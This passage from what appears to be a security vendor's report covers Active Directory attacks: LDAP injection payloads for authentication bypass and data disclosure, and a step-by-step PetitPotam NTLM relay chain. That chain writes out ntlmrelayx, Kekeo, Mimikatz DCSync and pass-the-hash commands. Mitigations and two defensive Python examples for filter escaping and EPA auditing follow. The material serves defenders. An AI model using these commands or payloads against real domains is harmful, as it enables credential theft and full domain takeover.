To protect against AS-REP roasting attacks, it is advisable to implement secure password policies,
especially for privileged accounts, that require long and complex passwords. This makes it a
challenge for an attacker to crack the passwords even if the hashes are stolen successfully.
Implementing fine-grained password policies is an effective first step to guarantee password
security.

Mitigation Technique 3: Audit Active Directory privileges

It is important to identify who has the authority to change the pre-authentication setting, since
it could be temporarily disabled to steal the AS-REP hash and then re-enabled. The following query
shows everyone with access rights to the accounts that do not require pre-authentication [40]:

(Get-ACL "AD:\$((Get-ADUser -Filter 'useraccountcontrol -band 4194304').DistinguishedName)").Access

The code retrieves the access control list (ACL) from the security descriptor associated with a
specific user object in Active Directory (AD).

First, it filters all user accounts in AD whose 'useraccountcontrol' value has the decimal bit
4194304 set (which corresponds to the UF_DONT_REQUIRE_PREAUTH flag of the userAccountControl
attribute) and retrieves their distinguished name. Then it retrieves the ACL of the security
descriptor of the first user account in the result set using that distinguished name. The final
.Access retrieves the Access property of the ACL and displays it, which represents the access
rights granted or denied to the security principals specified in the ACL for the target user object.

Attack Technique 6:

LDAP injection attack

LDAP, short for Lightweight Directory Access Protocol, is an open, vendor-neutral application
protocol used for directory service authentication. In other words, LDAP acts as a cross-platform
communication language for applications that talk to directory services, which store information
about objects and share that information with other entities on the network. One thing to keep in
mind is that LDAP and Active Directory are not the same; in fact, LDAP is the language that
Microsoft Active Directory (AD) understands. Therefore, whenever you need to access or authenticate
against data stored in AD, you use LDAP to communicate with the target server.

An LDAP query, in turn, is the command that asks a specific directory service for the information
you want.

By default, any valid unprivileged account in AD can use LDAP queries to obtain critical
information. For example, to list all users with the "Password never expires" option enabled,
execute the following LDAP query:

(&(objectCategory=user)(userAccountControl:1.2.840.113556.1.4.803:=65536))



LDAP injection is a type of vulnerability that allows an attacker to inject malicious input into an
LDAP query. This can result in unauthorized access to confidential information stored in the LDAP
directory or in the manipulation of the data stored there. LDAP injection attacks usually occur
because of a lack of proper input validation and sanitization on the LDAP client side (the
application that builds the query), where user-controlled values are concatenated directly into the
LDAP search filter. Attackers exploit this by injecting special characters into the query, which
change its intended meaning and allow the attacker to bypass authentication controls or retrieve
confidential information.

Techniques for performing an LDAP injection attack


LDAP injection attacks come in many forms; some of them are covered in this text. To go deeper
into the topic and learn about additional types of LDAP injection attack that are not mentioned
here, see [41].

LDAP Injection Type 1: privilege escalation

Privilege escalation refers to a situation in which low-security users can access high-security
information. This is achieved by injecting a filter that the LDAP server then processes.

For example, the attacker may target a directory with low-security documents, such as
"Information/Reports" and "Information/Upcoming projects".

The injection, in this case, would be as follows:

Information)(security_level=*))(&(directory=documents

The resulting filter from this injection would be the following:

(&(directory=Information)(security_level=*))(&(directory=Information)(security_level=low))

Since the LDAP server processes only the first filter, the second filter is ignored and the query
that is executed is "(&(directory=Information)(security_level=*))". This allows the attacker to
obtain a list of documents that would otherwise only be accessible to users with a high security
level, even though the attacker does not have the appropriate privileges.

LDAP Injection Type 2: Access Control Bypass

Login pages typically contain two fields for user input, one for the username and one for the
password. The fields are labeled USER (username) and PASSWORD (password). The client provides a
username/password pair, and LDAP confirms the existence of this pair by building search filters
and sending them to the LDAP server.

The filter is written as (&(USER=Alice)(PASSWORD=PaSsW0rd!+)). However, an attacker can manipulate
this by entering a valid username and injecting a sequence after it, effectively bypassing the
password check. Knowing the username, the attacker can enter any string as the password value,
which results in the following query being sent to the server:

(&(USER=Alice)(&))(PASSWORD=<any string>))

The LDAP server only processes the first filter and ignores the second, allowing the attacker into
the system without a proper password, since the query (&(USER=Alice)(&)) always evaluates as
correct.

LDAP Injection Type 3: Information Disclosure

A resource browser lets a user see which resources are available in a system, such as a website
that sells clothes. For example, a user can search for a specific item, such as notebooks or
stickers, to see whether it is available for sale. This is done through an LDAP query such as:
(|(type=Notebooks)(type=Stickers)).

However, an attacker can exploit this by injecting the string "uid=*" into the query, which
results in the following query: (|(type=Notebooks)(uid=*))(type=Stickers)).

This query will be processed by the LDAP server, returning not only all the available notebooks
but also all the user objects in the system.

Mitigation techniques for an LDAP injection attack

There are several mitigation techniques that prevent a possible LDAP injection attack.

Mitigation Technique 1: Escape all variables using the correct LDAP encoding

Escaping all variables using the correct LDAP encoding is one of the key mitigation techniques
against LDAP injection attacks. It involves encoding every user-supplied input in a way that makes
it difficult for attackers to inject malicious payloads into LDAP queries.

Mitigation Technique 2: Distinguished name escaping

LDAP uses the DN, or distinguished name, to store and identify names in its database. A DN acts
as a unique identifier, similar to a username, and can be used to access resources.

A DN consists of several parts separated by commas. For example, a DN might look like this [42]:

cn=Richard Feynman, ou=Department of Physics, dc=Caltech, dc=edu

Certain characters in a DN are considered special and must be escaped or handled correctly to
avoid problems with the DN. The list of special characters in a DN includes " # + < > , ; and
leading or trailing spaces.

However, there are also "special" characters that are allowed in distinguished names and do not
need to be escaped. These include * ( ) . ~ | @ $ % ^ & - ? : { } ! ' _ [ ] `

It is important to handle special characters properly in a DN to ensure that it works as expected
and to avoid problems or undesirable consequences when the DN is used.

Mitigation Technique 3: Search filter escaping

In the LDAP database, each DN, or distinguished name, uniquely points to a single entry, which can
be thought of as a row in a relational database management system (RDBMS). Each entry contains one
or more attributes, similar to columns in an RDBMS. Search filters can be used to query the LDAP
database and find entries with specific attributes.

Search filters use Polish notation, also known as prefix notation, to specify the search
conditions. For example, the following search filter would return all entries in the Physics
organizational unit that have Freeman Dyson or Albert Einstein as their manager [42].

(&(ou=Physics)(|(manager=cn=Freeman Dyson,ou=Physics,dc=Caltech,dc=edu)(manager=cn=Albert Einstein,ou=Physics,dc=Princeton,dc=edu)))

When building LDAP queries in application code, it is essential to escape any untrusted data that
is added to the query in order to avoid security issues. There are two types of LDAP escaping:
encoding for LDAP search filters and encoding for LDAP DNs. The proper way to escape depends on
whether the data is used in a search filter or as a DN, for example as a credential to access a
resource.

Special characters such as "(", ")", "*" and "\" must be escaped properly when used in a search
filter to ensure that the query executes as intended. For more information on search filter
escaping, refer to RFC 4515 [43].

Additional Defenses

To provide an additional layer of protection against LDAP injection attacks, organizations can
implement the following defensive measures:

Least privilege: limit the privileges assigned to the LDAP bind account, which is the account the
application uses to access the LDAP directory, to minimize the potential damage in the event of a
successful attack.

Enable bind authentication: configure the LDAP service to require bind authentication, which
verifies and authorizes the credentials provided by the user [44]. However, attackers can still
bypass bind authentication through anonymous binds [45] and unauthenticated binds [46], so these
bind options must also be disabled.

Allowlist input validation: implement input validation techniques to detect and prevent
unauthorized input from being passed into the LDAP query. This helps ensure that only approved
values are used when constructing LDAP queries, which reduces the risk of a successful LDAP
injection attack. Such validation may include regular expressions, data type and length
restrictions, and cross-reference checks against external lists or databases [47].
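The following Python program is an added example and is not code from this guide; it ties together the three injection types above, the two escaping techniques (search filter escaping per RFC 4515 and DN escaping per RFC 4514) and the allowlist validation just described. The usernames, payloads and filter shapes are constructed to mirror the guide's own examples; the function names and the username allowlist pattern are this example's assumptions. It also goes one step beyond the guide's character list: the DN escape set follows RFC 4514, which includes "\" and "=" in addition to the characters listed above.

```python
"""LDAP injection: vulnerable vs. escaped filter construction.

Added example, not code from the guide. Escaping follows RFC 4515
(search filter assertion values) and RFC 4514 (DN attribute values).
The filter shapes, usernames and payloads below are constructed to
mirror the guide's examples.
"""
import re

# RFC 4515: these characters must be replaced by \XX inside an assertion value.
_FILTER_ESCAPES = {"\\": r"\5c", "*": r"\2a", "(": r"\28", ")": r"\29", "\x00": r"\00"}


def escape_filter_value(value: str) -> str:
    """Encode a user-supplied value for use inside an LDAP search filter."""
    return "".join(_FILTER_ESCAPES.get(ch, ch) for ch in value)


# RFC 4514: characters that need a backslash in an RDN attribute value
# (the guide's list omits '\' and '='; RFC 4514 includes both).
_DN_SPECIAL = set('\\,+"<>;=')


def escape_dn_value(value: str) -> str:
    """Encode a user-supplied value for use as an RDN attribute value."""
    out = []
    last = len(value) - 1
    for i, ch in enumerate(value):
        if ch == "\x00":
            out.append("\\00")
        elif ch in _DN_SPECIAL:
            out.append("\\" + ch)
        elif (i == 0 and ch in "# ") or (i == last and ch == " "):
            # A leading '#' or space and a trailing space must also be escaped.
            out.append("\\" + ch)
        else:
            out.append(ch)
    return "".join(out)


def first_complete_filter(filter_str: str) -> str:
    """Return the first balanced filter, mimicking a server that evaluates the
    leading filter and ignores whatever follows it (the behaviour the guide's
    injection examples rely on)."""
    depth = 0
    for i, ch in enumerate(filter_str):
        if ch == "(":
            depth += 1
        elif ch == ")":
            depth -= 1
            if depth == 0:
                return filter_str[: i + 1]
    raise ValueError("unbalanced filter")


def login_filter_vulnerable(user: str, password: str) -> str:
    """The guide's login filter built by plain concatenation (injectable)."""
    return f"(&(USER={user})(PASSWORD={password}))"


def login_filter_safe(user: str, password: str) -> str:
    """Same filter with every user-controlled value escaped."""
    return f"(&(USER={escape_filter_value(user)})(PASSWORD={escape_filter_value(password)}))"


def document_filter_vulnerable(directory: str) -> str:
    """The guide's privilege-escalation example (injectable)."""
    return f"(&(directory={directory})(security_level=low))"


def document_filter_safe(directory: str) -> str:
    """Same filter with the directory name escaped."""
    return f"(&(directory={escape_filter_value(directory)})(security_level=low))"


# Allowlist validation as a second layer (assumed policy): letters, digits, '.', '_' or '-'.
_USERNAME_RE = re.compile(r"[A-Za-z0-9._-]{1,64}")


def is_valid_username(user: str) -> bool:
    """True only when the username matches the allowlist pattern exactly."""
    return _USERNAME_RE.fullmatch(user) is not None


if __name__ == "__main__":
    # Constructed payloads matching the guide's Type 1 and Type 2 examples.
    bypass_user = "Alice)(&))"
    print(first_complete_filter(login_filter_vulnerable(bypass_user, "anything")))
    print(first_complete_filter(login_filter_safe(bypass_user, "anything")))
    esc_dir = "Information)(security_level=*))(&(directory=documents"
    print(first_complete_filter(document_filter_vulnerable(esc_dir)))
    print(is_valid_username(bypass_user))
```

With the vulnerable builder, the Type 2 payload collapses the evaluated filter to (&(USER=Alice)(&)) and the password clause is never seen by the server; with the escaped builder the whole filter survives intact and the injected parentheses become literal \28 and \29 sequences that match no account. In production code the same two encodings are available as ldap.filter.escape_filter_chars and ldap.dn.escape_dn_chars in python-ldap.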

Attack Technique 7:
PetitPotam NTLM relay attack on Active Directory Certificate Services (AD CS)

The PetitPotam NTLM relay attack is a type of cyberattack that exploits the legacy Windows NTLM
protocol and the MS-EFSRPC protocol. It takes advantage of the insecure default configuration of
Active Directory Certificate Services (AD CS), which does not enforce Extended Protection for
Authentication (EPA).

In this attack, an attacker can coerce a domain controller into authenticating by exploiting the
PetitPotam vulnerability and relay that authentication to the AD CS server to request a
certificate for the domain controller account. With this certificate, the attacker can obtain a
TGT (Ticket Granting Ticket) for the relayed domain controller account and perform other
operations using its high privileges. This can lead to a complete domain takeover in just a few
steps and potentially allow the attacker to dump the domain administrator hashes.

It is important to note that this vulnerability was partially mitigated by a security update
released by Microsoft on Patch Tuesday, May 10, 2022, but the attack is still possible if the
attacker has Active Directory account credentials.

Techniques to carry out a PetitPotam NTLM relay attack on Active Directory Certificate Services
(AD CS)

In the following scenario, we demonstrate how an adversary can exploit the PetitPotam
vulnerability to gain full domain administrator privileges without prior authentication.

A typical PetitPotam NTLM relay attack consists of five steps.

Step 1: Relaying to the AD CS web enrollment page

In the first step, the attacker must ensure that [Link] from Impacket is configured to relay to
the AD CS web enrollment page.

sudo python3 [Link] -debug -smb2support --target [Link] --adcs --template KerberosAuthentication

SMB server configuration
HTTP server configuration
WCF Server Configuration
Servers started, waiting for connections

Note that the "--target" flag specifies the target URL to attack; in this case, the target is a
certificate server enrollment endpoint. The "--adcs" and "--template KerberosAuthentication" flags
indicate that the destination is an Active Directory Certificate Services (AD CS) server and that
the tool will request a certificate from a specific template. The "-debug" and "-smb2support"
flags enable debugging output and SMB version 2 support, respectively.

Step 2: Exploiting the PetitPotam vulnerability

To exploit the PetitPotam vulnerability, we need to specify both the DC and the attacker's IP.
[Link] can be downloaded from its official GitHub repository [49].

[Link] <listener ip> <target ip>

Note that the listener IP is the attacker's relay IP, while the target IP is the IP of the domain
controller targeted by the attacker. Once the adversary triggers the PetitPotam vulnerability, the
credentials are relayed to the AD CS server, where the certificate is enrolled.

... # See the first step.
Servers started, waiting for connections
...
CERTIFICATE OBTAINED!

[*] Base64 certificate of user DC-101$:

MIIRXQIBAz...LUSHLJCNIKmzEStB/3уе<ZKk31GbxwDU8t8wtx0YayLkKaJB5/c/tanzuJ10r08obkt

Step 3: Obtaining a Ticket Granting Ticket (TGT)

Now that the certificate is enrolled, the attacker can use it to obtain a Ticket Granting Ticket
(TGT). For this step, the attacker can take advantage of Kekeo or Rubeus [50]:

kekeo # base64 /input:on
. . .
kekeo # tgt::ask /pfx:<base64 certificate from the relay> /user:DC-101$ /domain:[Link] /ptt

This command successfully authenticates the adversary to the domain.

Step 4: DCSyncing the target user

In this step, the attacker can use Mimikatz to perform a DCSync attack against the krbtgt user.

lsadump::dcsync /domain:[Link] /user:krbtgt

Note that in the command, the attacker specifies the target domain ("[Link]") and the user whose
secrets are requested ("krbtgt"), a privileged account in Active Directory whose key is used to
issue Kerberos tickets.

The 'lsadump::dcsync' module is used to perform a 'DCSync' attack, a type of attack that lets the
attacker simulate the behavior of a domain controller and retrieve password hashes, Kerberos keys
and other confidential information from the Active Directory database. By running this command,
the adversary obtains the password hash of the krbtgt user: 186c026974e59a14040dbc63aa8fb8c4.

Step 5: Pass the hash

In this step, the adversary can use the [Link] tool from Impacket to pass the hash obtained in the
previous step and get an interactive shell on the domain controller.

[Link] -hashes :186c026974e59a14040dbc63aa8fb8c4 EXAMPLE/krbtgt@<target-ip>

In simpler terms, these two flaws work together to allow someone with limited access to quickly
gain complete control of a network or system. Even if the network or system is fully updated with
the latest security patches, these vulnerabilities can still be exploited to cause severe damage
in just a few minutes.

Mitigation techniques for a PetitPotam NTLM relay attack on Active Directory Certificate Services
(AD CS)

To protect networks against NTLM relay attacks, domain administrators must take steps to protect
services that are enabled for NTLM authentication. The PetitPotam threat exploits servers that
lack protection against NTLM relay attacks in Active Directory Certificate Services (AD CS). This
mitigation guidance provides steps for AD CS customers to protect their servers from this type of
attack.

If AD CS is used with the following services, your network may be vulnerable:

• Certificate Authority Web Enrollment
• Certificate Enrollment Web Service

Microsoft suggests the following steps to mitigate possible attacks on AD CS servers [51]:

Step 1: Enable Extended Protection for Authentication (EPA) for Certificate Authority Web
Enrollment and for the Certificate Enrollment Web Service. This can be done through Internet
Information Services (IIS) Manager, with 'Required' being the recommended and most secure option.

Step 2: Update the [Link] file created by the Certificate Enrollment Web Service role, located at
<%windir%>\systemdata\CES\<CA Name>_CES_Kerberos\[Link], to reflect the selected EPA setting.

Step 3: This is done by adding <extendedProtectionPolicy> with a value of "WhenSupported" or
"Always", according to the EPA setting in the IIS user interface. The "Always" value should be
used when the EPA setting is 'Required'.

Step 4: Enable SSL-only connections by turning on the "Require SSL" option in IIS Manager.

Figure 2. Enabling SSL-only connections in IIS Manager [51].

Step 5: After completing these steps, it is important to restart IIS to load the changes. This can
be done by opening an elevated command prompt and typing the following command:

iisreset /restart

Note that this command stops all IIS services and then restarts them.

For more information about the available options for <extendedProtectionPolicy>, see the transport
settings of basicHttpBinding. A sample configuration is provided [51]:

<binding name="TransportWithHeaderClientAuth">
  <security mode="Transport">
    <transport clientCredentialType="Windows">
      <extendedProtectionPolicy policyEnforcement="Always" />
    </transport>
    <message clientCredentialType="None" establishSecurityContext="false" negotiateServiceCredential="false" />
  </security>
  <readerQuotas maxStringContentLength="131072" />
</binding>
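As an added example (not code from this guide or from Microsoft), the following Python script audits the basicHttpBinding section that Steps 2 and 3 ask administrators to edit and reports any binding whose extendedProtectionPolicy is missing or is not set to "Always". Both configuration fragments are constructed samples built around the element names in the guide's sample; the wrapper elements (configuration, system.serviceModel, bindings), the function names and the on-disk path are assumptions of this example.

```python
"""Audit the Certificate Enrollment Web Service binding for EPA enforcement.

Added example, not code from the guide or from Microsoft. It parses the
basicHttpBinding section that the mitigation steps ask administrators to
edit and reports bindings whose extendedProtectionPolicy is not "Always".
The two config fragments are constructed samples; audit_config_file()
reads a real configuration file from an assumed path.
"""
import xml.etree.ElementTree as ET

# Constructed: a binding hardened as the guide's sample configuration shows.
HARDENED_CONFIG = """<configuration>
  <system.serviceModel>
    <bindings>
      <basicHttpBinding>
        <binding name="TransportWithHeaderClientAuth">
          <security mode="Transport">
            <transport clientCredentialType="Windows">
              <extendedProtectionPolicy policyEnforcement="Always" />
            </transport>
            <message clientCredentialType="None" establishSecurityContext="false" negotiateServiceCredential="false" />
          </security>
          <readerQuotas maxStringContentLength="131072" />
        </binding>
      </basicHttpBinding>
    </bindings>
  </system.serviceModel>
</configuration>
"""

# Constructed: the same binding before the mitigation (no EPA element at all).
WEAK_CONFIG = """<configuration>
  <system.serviceModel>
    <bindings>
      <basicHttpBinding>
        <binding name="TransportWithHeaderClientAuth">
          <security mode="Transport">
            <transport clientCredentialType="Windows" />
          </security>
        </binding>
      </basicHttpBinding>
    </bindings>
  </system.serviceModel>
</configuration>
"""


def audit_epa_bindings(config_xml: str) -> list:
    """Return one finding per basicHttpBinding/binding that is not fully
    hardened; an empty list means every binding enforces EPA."""
    root = ET.fromstring(config_xml)
    findings = []
    for bhb in root.iter("basicHttpBinding"):
        for binding in bhb.findall("binding"):
            name = binding.get("name", "<unnamed>")
            security = binding.find("security")
            if security is None or security.get("mode") != "Transport":
                findings.append(f"{name}: security mode is not Transport")
                continue
            transport = security.find("transport")
            policy = transport.find("extendedProtectionPolicy") if transport is not None else None
            if policy is None:
                findings.append(f"{name}: extendedProtectionPolicy is missing (EPA not enforced)")
            elif policy.get("policyEnforcement") != "Always":
                # "WhenSupported" still lets a client that omits channel binding authenticate.
                findings.append(f"{name}: policyEnforcement is "
                                f"{policy.get('policyEnforcement')!r}, expected 'Always'")
    return findings


def audit_config_file(path: str) -> list:
    """Audit a configuration file on disk (the path is an assumption of this example)."""
    with open(path, encoding="utf-8") as fh:
        return audit_epa_bindings(fh.read())


if __name__ == "__main__":
    for label, cfg in (("hardened", HARDENED_CONFIG), ("weak", WEAK_CONFIG)):
        findings = audit_epa_bindings(cfg)
        print(f"{label}: {'OK' if not findings else findings}")
```

Run against the hardened sample the audit returns no findings; against the pre-mitigation sample it reports the missing extendedProtectionPolicy element, and a binding set to "WhenSupported" is flagged as weaker than the "Always" value the guide recommends for the 'Required' EPA setting.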

Conclusion

In conclusion, the increasing frequency and sophistication of attacks targeting Active Directory
are evident. The common attacks discussed in this report, such as Pass the Hash, Pass the Ticket,
Kerberoasting, Golden Ticket, DCShadow, AS-REP Roasting, LDAP Injection and PetitPotam NTLM Relay
attacks, exemplify the countless ways in which adversaries can exploit vulnerabilities within an
organization's Active Directory infrastructure.

Considering the crucial role that Active Directory plays in regulating access to an organization's
confidential data and resources, it is imperative that organizations take proactive measures to
defend themselves against this type of attack. This requires a multi-layered approach that
incorporates regular security audits, vulnerability assessments and continuous monitoring to
detect and address threats in real time.

It is crucial to recognize that attackers constantly adapt their tactics, which requires
organizations to remain vigilant and continually update their security measures to stay ahead of
emerging threats. By investing in comprehensive security measures and closely monitoring the
evolving threat landscape, organizations can mitigate the risk of falling victim to an Active
Directory attack.

References

[1] "[MS-ADTS]: Introduction". [Online]. Available: [Link]-457b-877c-db97b1e1802f. [Accessed: February 10, 2023]

[2] "Active Directory: What is it? Why is it important?", Intermedia, March 10, 2022. [Online]. Available: [Link] [Accessed: February 10, 2023]

[3] E. B. Abid, "Benefits of Active Directory (pros and cons)", Cloud Infrastructure Services, August 22, 2021. [Online]. Available: [Link] [Accessed: February 10, 2023]

[4] "Benefits of Microsoft 365 and Azure Active Directory for identity management", Technologies, June 22, 2022. [Online]. Available: [Link]management/. [Accessed: February 10, 2023]

[5] "DBIR 2022 Report - Master's Guide", Verizon Business. [Online]. Available: [Link] [Accessed: February 10, 2023]

[6] "Cost of a Data Breach Report 2022". [Online]. Available: [Link]/downloads/cas/3R8N1DZJ. [Accessed: February 10, 2023]

[7] "Compare Active Directory with Azure Active Directory". [Online]. Available: [Link]compare-azure-ad-to-ad. [Accessed: February 10, 2023]

[8] A. Robbins, "How Azure Active Directory attackers move to on-premises AD", The New Stack, May 26, 2022. [Online]. Available: [Link] [Accessed: February 10, 2023]

[9] "GitHub - ParrotSec/mimikatz", GitHub. [Online]. Available: [Link] [Accessed: February 7, 2023]

[10] "GitHub - Hackplayers/evil-winrm: The ultimate WinRM shell for hacking/pentesting", GitHub. [Online]. Available: [Link] [Accessed: February 7, 2023]

[11] "ProcDump - Sysinternals". [Online]. Available: [Link] [Accessed: February 7, 2023]

[12] "gsecdump". [Online]. Available: [Link] [Accessed: February 7, 2023]

[13] H. C. Yuceel, "The MITRE ATT&CK T1003 OS Credential Dumping technique and its adversary use", March 23, 2022. [Online]. Available: [Link]technique-and-its-opponent-use. [Accessed: February 7, 2023]

[14] "5985,5986 - Pentesting WinRM". [Online]. Available: [Link] [Accessed: February 7, 2023]

[15] "mimikatz > sekurlsa::logonpasswords". [Online]. Available: [Link] [Accessed: February 9, 2023]

[16] "Detecting lateral movement through tracking event logs". [Online]. Available: [Link] [Accessed: February 9, 2023]

[17] J. Warren, "How to detect Pass-the-Hash attacks". [Online]. Available: [Link] [Accessed: February 9, 2023]

[18] "Mitigating Pass-the-Hash (PtH) attacks and other credential theft techniques". [Online]. Available: [Link]Pass-the-Hash (PtH) Attacks and Other Credential Theft techniques_Spanish.pdf. [Accessed: February 9, 2023]

[19] "GitHub - gentilkiwi/kekeo: A little toolbox to play with Microsoft Kerberos in C", GitHub. [Online]. Available: [Link] [Accessed: February 7, 2023]

[20] "GitHub - GhostPack/Rubeus: Trying to tame the three-headed dog", GitHub. [Online]. Available: [Link] [Accessed: February 7, 2023]

[21] "creddump7", Kali Linux. [Online]. Available: [Link] [Accessed: February 7, 2023]

[22] R. Chandel, "A detailed guide on Rubeus", Hacking Articles, May 11, 2022. [Online]. Available: [Link] [Accessed: February 7, 2023]

[23] JasonGerend, "Kerberos Authentication Overview". [Online]. Available: [Link] [Accessed: February 7, 2023]

[24] "Kerberoast". [Online]. Available: [Link] [Accessed: January 13, 2023]

[25] "Kerberoasting Attack", Netwrix. [Online]. Available: [Link] [Accessed: January 13, 2023]

[26] "Attack Tutorial: How Kerberoasting Attack Works", Netwrix. [Online]. Available: [Link] [Accessed: January 13, 2023]

[27] "Sneaky Active Directory persistence trick #18: placing SPNs on admin accounts for later Kerberoasting". [Online]. Available: [Link] [Accessed: February 9, 2023]

[28] S. Metcalf, "Detecting Kerberoasting Activity", Active Directory Security, February 5, 2017. [Online]. Available: [Link] [Accessed: February 9, 2023]

[29] "Cracking Kerberos TGS Tickets Using Kerberoasting". [Online]. Available: [Link]

[30] K. Mistele, "Impacket Deep Dives Vol. 2: Attacking Kerberos", Medium, June 5, 2021. [Online]. Available: [Link]dd472a. [Accessed: February 8, 2023]

[31] "Golden Ticket Attack", Netwrix. [Online]. Available: [Link] [Accessed: February 8, 2023]

[32] "Golden ticket attacks: how they work and how to defend against them", Search. [Online]. Available: [Link]st-them/. [Accessed: February 9, 2023]

[33] V. Navali, "Detecting an unauthorized domain controller: DCShadow attack", SentinelOne, August 15, 2022. [Online]. Available: [Link]ck/. [Accessed: February 8, 2023]

[34] "DCShadow Attack using Mimikatz", Netwrix. [Online]. [Accessed: February 8, 2023]

[35] "5136(S): A directory service object was modified", Microsoft. [Online]. Available: [Link] [Accessed: February 10, 2023]

[36] "Detecting lateral movement through tracking event logs". [Online]. Available: [Link] [Accessed: February 10, 2023]

[37] "AS-REP Roasting". [Online]. Available: [Link]credential-access/steal-or-forge-kerberos-tickets/as-rep-roasting. [Accessed: February 8, 2023]

[38] A. Berlin, "How to detect AS-REP roasting with Blumira", Blumira, December 7, 2021. [Online]. Available: [Link] [Accessed: February 8, 2023]

[39] "AS-REP Roasting". [Online]. Available: [Link]credential-access/steal-or-forge-kerberos-tickets/as-rep-roasting. [Accessed: February 8, 2023]

[40] J. Dibley, "Cracking Active Directory passwords with AS-REP Roasting". [Online]. Available: [Link] [Accessed: February 8, 2023]

[41] A. Dizdar, "Complete guide to LDAP injection: types, examples and prevention", Bright Security, June 2, 2021. [Online]. Available: [Link] [Accessed: February 9, 2023]

[42] "LDAP Injection Prevention - OWASP Cheat Sheet Series". [Online]. Available: [Link].html. [Accessed: February 9, 2023]

[43] T. Howes and M. C. Smith, "RFC 4515: Lightweight Directory Access Protocol (LDAP): String Representation of Search Filters", IETF Datatracker, June 8, 2006. [Online]. Available: [Link] [Accessed: February 9, 2023]

[44] "The LDAP bind operation", [Link], April 27, 2018. [Online]. Available: [Link] [Accessed: February 9, 2023]

[45] "3.4 - Anonymous bind on the LDAP server must be disabled". [Online]. Available: [Link] revision: 8bc4cb19c1fe0abfc3edcf804e7603f0. [Accessed: February 9, 2023]

[46] M.-A. Moreau, "Why unauthenticated LDAP binds in Active Directory should be disabled, and how to do it", The Devolutions Blog. [Online]. Available: [Link]should-be-disabled-and-how-to-do-it/. [Accessed: February 9, 2023]

[47] "Input Validation - OWASP Cheat Sheet Series". [Online]. Available: [Link] [Accessed: February 9, 2023]

[48] "From Stranger to DA // Using PetitPotam to relay NTLM to Domain Administrator", Truesec. [Online]. Available: [Link] [Accessed: February 9, 2023]

[49] "GitHub - topotam/PetitPotam: PoC tool to coerce Windows hosts to authenticate to other machines via MS-EFSRPC EfsRpcOpenFileRaw or other functions", GitHub. [Online]. Available: [Link] [Accessed: February 9, 2023]

[50] "PetitPotam | NTLM Relay Attacks | AD CS | Mimikatz | Rubeus | Domain takeover" (Jul. 29, 2021). [Online]. Available: [Link] [Accessed: February 9, 2023]

[51] "KB5005413: Mitigating NTLM relay attacks on Active Directory Certificate Services (AD CS)". [Online]. Available: [Link]ad-cs-3612b773-4043-4aa9-b23d-b87910cd3429. [Accessed: February 9, 2023]

About

At Picus Security, we help organizations validate, measure, and continuously improve the
effectiveness of their security controls so that they can assess risk more accurately and
strengthen cyber resilience.

As the pioneer of breach and attack simulation (BAS), security teams around the world use our
complete security control validation platform to proactively identify security gaps and gain
actionable insights to address them.

Picus Security: [Link]